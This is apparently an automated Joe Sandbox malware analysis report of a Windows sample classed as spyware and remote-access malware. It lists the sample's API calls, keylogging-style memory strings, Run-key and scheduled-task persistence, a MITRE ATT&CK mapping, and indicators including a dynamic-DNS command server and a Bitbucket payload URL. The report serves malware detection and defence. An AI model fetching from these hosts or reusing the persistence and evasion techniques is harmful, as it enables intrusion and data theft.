Source: dyfwtd.exe, 00000007.00000002.3316624508.0000000009B27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerb8cea6
Source: dyfwtd.exe, 00000007.00000002.3316624508.0000000009B27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [2024/12/12 11:36:26 Program Manager]
Source: dyfwtd.exe, 00000007.00000002.3316624508.0000000009B27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [2024/12/12 11:36:32 Program Manager]
Source: dyfwtd.exe, 00000007.00000002.3316624508.0000000009B27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager?
Source: dyfwtd.exe, 00000007.00000002.3316624508.0000000009B27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerrt\|
Source: dyfwtd.exe, 00000007.00000002.3316624508.0000000009B27000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,		0_2_00412430
Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe	Code function: GetLocaleInfoA,		0_2_00490D7C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe VolumeInformation

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe

Code function: 0_2_0045F0B0 EnterCriticalSection,GetCurrentThread,SetThreadPriority,CreateFileA,LeaveCriticalSection,SetFilePointer,GetLocalTime,GetCurrentThreadId,GetCurrentThreadId,GetCurrentProcess,GetCurrentProcess,CloseHandle,LeaveCriticalSection,

0_2_0045F0B0

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe

Code function: 0_2_0045E300 GetSystemTimeAsFileTime,GetModuleFileNameA,lstrcpyA,GetUserNameA,lstrcpyA,GetSystemInfo,GlobalMemoryStatus,

0_2_0045E300

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe

Code function: 0_2_00487BC0 _strlen,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

0_2_00487BC0

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe

Code function: 0_2_004830CF EntryPoint,GetVersionExA,GetModuleHandleA,

0_2_004830CF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match	File source: 6.2.dyfwtd.exe.13450000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dyfwtd.exe.13450000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dyfwtd.exe.5ab0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dyfwtd.exe.5ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3316624508.0000000009B27000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2147653043.0000000013450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2147341971.0000000005AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dyfwtd.exe PID: 5516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dyfwtd.exe PID: 3272, type: MEMORYSTR

Remote Access Functionality

Source: Yara match	File source: 6.2.dyfwtd.exe.13450000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dyfwtd.exe.13450000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dyfwtd.exe.5ab0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.dyfwtd.exe.5ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3316624508.0000000009B27000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2147653043.0000000013450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2147341971.0000000005AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dyfwtd.exe PID: 5516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dyfwtd.exe PID: 3272, type: MEMORYSTR

Source: C:\Users\user\Desktop\hCJ8gK9kNn.exe

Code function: 0_2_00462680 socket,WSAGetLastError,htonl,htons,bind,WSAGetLastError,inet_addr,GetLastError,listen,WSAGetLastError,WSACreateEvent,WSAEventSelect,

0_2_00462680

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	131 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	111 Input Capture	2 System Time Discovery	Remote Services	12 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Scheduled Task/Job	12 Windows Service	12 Windows Service	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	111 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Service Execution	11 Scheduled Task/Job	42 Process Injection	2 Obfuscated Files or Information	Security Account Manager	136 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	11 Registry Run Keys / Startup Folder	11 Scheduled Task/Job	3 Software Packing	NTDS	131 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	11 Registry Run Keys / Startup Folder	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	141 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	42 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
hCJ8gK9kNn.exe	32%	ReversingLabs	Win32.Ransomware.Generic

Source	Detection	Scanner	Label
http://www.geomind.co.kr/	0%	Avira URL Cloud	safe
newstaticfreepoint24.ddns-ip.net	0%	Avira URL Cloud	safe
http://www.hdsentinel.com	0%	Avira URL Cloud	safe
https://bbuseruploads.s3.amazonaws	0%	Avira URL Cloud	safe
http://www.hdsentinel.com/sendreport.phpU	0%	Avira URL Cloud	safe
http://www.hdsentinel.comU	0%	Avira URL Cloud	safe
http://www.geomind.co.kr/Online	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s3-w.us-east-1.amazonaws.com	3.5.25.23	true	false	high
bitbucket.org	185.166.143.49	true	false	high
navegacionseguracol24vip.org	181.131.217.244	true	false	high
newstaticfreepoint24.ddns-ip.net	181.131.217.244	true	true	unknown
bbuseruploads.s3.amazonaws.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://bitbucket.org/facturacioncol/fact/downloads/null.exe	false		high
newstaticfreepoint24.ddns-ip.net	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://bbuseruploads.s3.amazonaws.com	csc.exe, 00000003.00000002.3317409163.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006D79000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net	csc.exe, 00000003.00000002.3317409163.0000000006D75000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	csc.exe, 00000003.00000002.3319438759.0000000009510000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.0000000008275000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006CC1000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.000000000813E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	csc.exe, 00000003.00000002.3319438759.0000000009510000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.0000000008275000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.000000000813E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://bitbucket.org	csc.exe, 00000003.00000002.3317409163.0000000006FB8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://web-security-reports.services.atlassian.com/csp-report/bb-website	csc.exe, 00000003.00000002.3317409163.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FB8000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FD5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006D75000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-net	csc.exe, 00000003.00000002.3319438759.0000000009510000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.0000000008275000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.000000000813E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/	csc.exe, 00000003.00000002.3317409163.0000000006D75000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.geomind.co.kr/	hCJ8gK9kNn.exe, OrionLegacyCLI.exe.0.dr	false	Avira URL Cloud: safe	unknown
http://www.hdsentinel.comU	csc.exe, 00000003.00000003.1875083635.00000000084A0000.00000004.00000800.00020000.00000000.sdmp, dyfwtd.exe, 00000006.00000000.1880838318.000000000051C000.00000020.00000001.01000000.00000008.sdmp, dyfwtd.exe, 00000006.00000002.2147868994.00000000135EE000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.indyproject.org/	HardDiskSentinelBin.exe.6.dr	false		high
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/	csc.exe, 00000003.00000002.3317409163.0000000006D75000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net	csc.exe, 00000003.00000002.3317409163.0000000006D75000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dz8aopenkvv6s.cloudfront.net	csc.exe, 00000003.00000002.3317409163.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FB8000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FD5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006D75000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.hdsentinel.com/sendreport.phpU	csc.exe, 00000003.00000003.1875083635.00000000084A0000.00000004.00000800.00020000.00000000.sdmp, dyfwtd.exe, 00000006.00000000.1880838318.000000000051C000.00000020.00000001.01000000.00000008.sdmp, dyfwtd.exe, 00000006.00000002.2147868994.00000000135EE000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-neti	csc.exe, 00000003.00000002.3319438759.0000000009510000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.0000000008275000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.000000000813E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gp/C	dyfwtd.exe, 00000006.00000002.2147653043.0000000013450000.00000040.00001000.00020000.00000000.sdmp, dyfwtd.exe, 00000006.00000002.2147341971.0000000005AB0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net	csc.exe, 00000003.00000002.3317409163.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FB8000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FD5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006D75000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net	csc.exe, 00000003.00000002.3317409163.0000000006D75000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	csc.exe, 00000003.00000002.3319438759.0000000009510000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.0000000008275000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.000000000813E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	csc.exe, 00000003.00000002.3319438759.0000000009510000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.0000000008275000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.1875083635.000000000813E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbuseruploads.s3.amazonaws	csc.exe, 00000003.00000002.3317409163.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.cookielaw.org/	csc.exe, 00000003.00000002.3317409163.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FB8000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FD5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006D75000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.geomind.co.kr/Online	hCJ8gK9kNn.exe, OrionLegacyCLI.exe.0.dr	false	Avira URL Cloud: safe	unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;	csc.exe, 00000003.00000002.3317409163.0000000006D75000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aui-cdn.atlassian.com/	csc.exe, 00000003.00000002.3317409163.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FB8000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FD5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006D75000.00000004.00000800.00020000.00000000.sdmp	false		high
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net	csc.exe, 00000003.00000002.3317409163.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FB8000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FD5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006D75000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-	csc.exe, 00000003.00000002.3317409163.0000000006FDA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006D79000.00000004.00000800.00020000.00000000.sdmp	false		high
http://s3-w.us-east-1.amazonaws.com	csc.exe, 00000003.00000002.3317409163.0000000006FF9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	csc.exe, 00000003.00000002.3317409163.00000000070AE000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006CC1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bitbucket.org	csc.exe, 00000003.00000002.3317409163.0000000006CC1000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3317409163.0000000006FA7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://bbuseruploads.s3.amazonaws.com	csc.exe, 00000003.00000002.3317409163.0000000006FF9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.hdsentinel.com	csc.exe, 00000003.00000003.1875083635.00000000084A0000.00000004.00000800.00020000.00000000.sdmp, dyfwtd.exe, 00000006.00000000.1880838318.000000000051C000.00000020.00000001.01000000.00000008.sdmp, dyfwtd.exe, 00000006.00000002.2147868994.00000000135EE000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
3.5.25.23	s3-w.us-east-1.amazonaws.com	United States	14618	AMAZON-AESUS	false
181.131.217.244	navegacionseguracol24vip.org	Colombia	13489	EPMTelecomunicacionesSAESPCO	false
185.166.143.49	bitbucket.org	Germany	16509	AMAZON-02US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1573889
Start date and time:	2024-12-12 17:34:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	hCJ8gK9kNn.exe renamed because original name is a hash value
Original Sample Name:	e420b000de0e86869fed544967e39722370f2ac558f5e780341c4a8f365426a4.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@6/4@4/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 72% Number of executed functions: 23 Number of non-executed functions: 330
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target dyfwtd.exe, PID 3272 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: hCJ8gK9kNn.exe

Simulations

Behavior and APIs

Time	Type	Description
17:35:40	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLI C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe
17:35:48	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLI C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe
17:35:53	Task Scheduler	Run new task: dyfwtd path: C:\Users\user\AppData\Local\Temp\dyfwtd.exe
17:36:22	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run HardDiskSentinea C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exe
17:36:30	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run HardDiskSentinea C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
181.131.217.244	VwiELrqQjD.exe	Get hash	malicious	Remcos	Browse
	ozfqy8Ms6t.exe	Get hash	malicious	Unknown	Browse
	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse
	pPLwX9wSrD.exe	Get hash	malicious	Unknown	Browse
	s0tuvMen1D.exe	Get hash	malicious	AsyncRAT, DcRat	Browse
	SYSnyI8qDu.exe	Get hash	malicious	Remcos	Browse
	QU4rXM7CiL.exe	Get hash	malicious	Remcos	Browse
	4wECQoBvYC.exe	Get hash	malicious	Remcos	Browse
	nlfb.exe	Get hash	malicious	Unknown	Browse
185.166.143.49	http://jasonj002.bitbucket.io/	Get hash	malicious	HTMLPhisher	Browse	jasonj002.bitbucket.io/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
navegacionseguracol24vip.org	ozfqy8Ms6t.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
	pPLwX9wSrD.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
s3-w.us-east-1.amazonaws.com	ozfqy8Ms6t.exe	Get hash	malicious	Unknown	Browse	3.5.29.178
	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse	3.5.28.146
	financial_policy_December 10, 2024.pdf	Get hash	malicious	KnowBe4, PDFPhish	Browse	54.231.205.1
	https://login.hr-internal.co/27553be9ed867726?l=50	Get hash	malicious	Unknown	Browse	3.5.28.204
	http://prntbl.concejomunicipaldechinu.gov.co	Get hash	malicious	Unknown	Browse	16.15.193.78
	https://github.com/Matty77o/malware-samples-m-h/blob/main/TheTrueFriend.exe	Get hash	malicious	Unknown	Browse	54.231.165.145
	https://auth.ball.com	Get hash	malicious	Unknown	Browse	16.182.101.169
	https://businessnotice.org/dhl/22450156620/tracking?u=84775-c0bf6be57168918ea5fe039631be6c3a772f4fac11292328fca4a210ba0e8890	Get hash	malicious	Unknown	Browse	52.217.98.132
	https://quiet-sun-5d9f.atmos4.workers.dev/login	Get hash	malicious	Unknown	Browse	3.5.23.166
	https://uhu145fc.s3.amazonaws.com/bf63.html?B3E2629E-DF5B-2F28-7322FD910FB23F54	Get hash	malicious	Phisher	Browse	54.231.225.9
bitbucket.org	ozfqy8Ms6t.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	pPLwX9wSrD.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	https://feji.us/m266he	Get hash	malicious	Unknown	Browse	185.166.143.50
	lLNOwu1HG4.js	Get hash	malicious	RHADAMANTHYS	Browse	185.166.143.50
	iVH355vnza.vbs	Get hash	malicious	Unknown	Browse	185.166.143.50
	9QwZPBACyK.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	PQwHxAiBGt.exe	Get hash	malicious	RHADAMANTHYS	Browse	185.166.143.50
	YWFMFVCSun.bat	Get hash	malicious	AsyncRAT, DcRat	Browse	185.166.143.48

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	http://setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.com	Get hash	malicious	Unknown	Browse	44.221.84.105
	phish_alert_sp2_2.0.0.0 (1).eml	Get hash	malicious	Unknown	Browse	54.146.214.76
	https://cdn.iobit.com/dl/driver_booster_setup.exe	Get hash	malicious	Unknown	Browse	35.174.38.64
	jew.mpsl.elf	Get hash	malicious	Unknown	Browse	54.204.149.181
	jew.m68k.elf	Get hash	malicious	Unknown	Browse	34.199.141.162
	427c7bdc-ea02-97de-e5ef-a2c58c2d0a48.eml	Get hash	malicious	Unknown	Browse	54.224.241.105
	Non_disclosure_agreement.lnk.download.lnk	Get hash	malicious	Unknown	Browse	34.196.82.111
	https://feji.us/m266he	Get hash	malicious	Unknown	Browse	44.216.196.47
	jew.sh4.elf	Get hash	malicious	Unknown	Browse	54.157.203.139
	examHTB.ps1	Get hash	malicious	Metasploit	Browse	18.207.78.25
EPMTelecomunicacionesSAESPCO	VwiELrqQjD.exe	Get hash	malicious	Remcos	Browse	181.131.217.244
	ozfqy8Ms6t.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
	pPLwX9wSrD.exe	Get hash	malicious	Unknown	Browse	181.131.217.244
	s0tuvMen1D.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	181.131.217.244
	SYSnyI8qDu.exe	Get hash	malicious	Remcos	Browse	181.131.217.244
	QU4rXM7CiL.exe	Get hash	malicious	Remcos	Browse	181.131.217.244
	ppc.elf	Get hash	malicious	Mirai	Browse	191.98.81.24
	x86.elf	Get hash	malicious	Mirai	Browse	190.29.49.250
AMAZON-02US	ozfqy8Ms6t.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	pPLwX9wSrD.exe	Get hash	malicious	Unknown	Browse	185.166.143.50
	file.exe	Get hash	malicious	Vidar	Browse	18.238.49.124
	file.exe	Get hash	malicious	Invicta Stealer, XWorm	Browse	45.112.123.126
	jew.arm.elf	Get hash	malicious	Unknown	Browse	52.30.223.81
	7299_output.vbs	Get hash	malicious	Unknown	Browse	3.78.28.71
	7166_output.vbs	Get hash	malicious	AsyncRAT	Browse	18.197.239.5
	phish_alert_sp2_2.0.0.0 (1).eml	Get hash	malicious	Unknown	Browse	52.219.193.160

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	ozfqy8Ms6t.exe	Get hash	malicious	Unknown	Browse	3.5.25.23 185.166.143.49
	3XSXmrEOw7.exe	Get hash	malicious	Unknown	Browse	3.5.25.23 185.166.143.49
	pPLwX9wSrD.exe	Get hash	malicious	Unknown	Browse	3.5.25.23 185.166.143.49
	NOTIFICACIONES+FISCALES+Y+DEMANDAS+PENDIENTES.pdf.pdf	Get hash	malicious	Unknown	Browse	3.5.25.23 185.166.143.49
	file.exe	Get hash	malicious	Invicta Stealer, XWorm	Browse	3.5.25.23 185.166.143.49
	http://duckduckgogg42xjoc72x3sjasowoarfbgcmvfimaftt6twagswzczad.onion	Get hash	malicious	Unknown	Browse	3.5.25.23 185.166.143.49
	questionable.ps1	Get hash	malicious	Unknown	Browse	3.5.25.23 185.166.143.49
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	3.5.25.23 185.166.143.49
	3jr0P5izLl.exe	Get hash	malicious	LummaC	Browse	3.5.25.23 185.166.143.49

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe	pPLwX9wSrD.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\fdgfghgfhg\logs.dat

Process:	C:\Users\user\AppData\Local\Temp\dyfwtd.exe
File Type:	data
Category:	dropped
Size (bytes):	488
Entropy (8bit):	3.2801161580538234
Encrypted:	false
SSDEEP:	12:6laI9hecmlaI9bWFe5UlaIEQclaImbWFe5UlaIaclaIifIbW+:6F6cmFhWqUFEQcFCWqUFBFHW+
MD5:	5A5E89E977BD81BA8B3E71F8AA5365D7
SHA1:	02F20B08C232B84EA617EC69F244C469DF15ADC8
SHA-256:	825649F3C797454B59BB9EA1BC165BEF7E13D38CA8E0471E40D2F35FEF3F41CF
SHA-512:	DC2385EA105295A7C18714E276DAAA50CEEB4F7965D18F410AFEF86F46BB4072ACE365C1104BC9D2DA29D22B7366602A234226EB56E6F23C6F58EDC07299A8BC
Malicious:	false
Reputation:	low
